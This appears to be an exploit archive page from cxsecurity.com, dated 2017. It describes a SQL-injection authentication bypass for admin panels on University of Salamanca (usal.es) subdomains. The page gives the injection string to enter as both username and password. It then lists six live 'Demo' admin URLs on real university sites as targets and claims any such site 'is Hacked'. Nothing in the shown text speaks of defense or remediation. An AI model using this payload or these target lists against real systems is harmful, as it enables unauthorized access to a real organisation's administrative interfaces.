Usal - Admin panel Authentication bypass

2017.11.20
Credit: Reza Li
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

____________________________________________________________________ # Exploit Title: --- Usal - Admin panel Authentication bypass --- ____________________________________________________________________ # # # # # # Google Dork: whatever :) # Date: 2017-11-20 # # Exploit Author: => Reza Li # # Telegram = N4tw0rk # # ################################################################### # Description:Any Site that has this perfix is Hacked (Usal) # # # Example : http://site.es/~deportes/admin/index.php # # # # Enter Username and Password : '=' 'OR' # # # # Demo = http://munusal.usal.es/~deportes/admin/index.php # http://masterenhistoria.usal.es/~deportes/admin/index.php # http://buengobierno.usal.es/~deportes/admin/index.php # http://control.usal.es/~deportes/admin/index.php # http://revistas.usal.es/~deportes/admin/index.php # http://ticedu.usal.es/~deportes/admin/index.php # # # # ################################################################### # # Category: Webapps # Version: All Version # Tested on: Windows10 # Language: PHP # ________________________________________________________ | Discovered By : Reza Li | ;) My Friend =====> Ali Afee Telegram = N4tw0rk ________________________________________________________


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top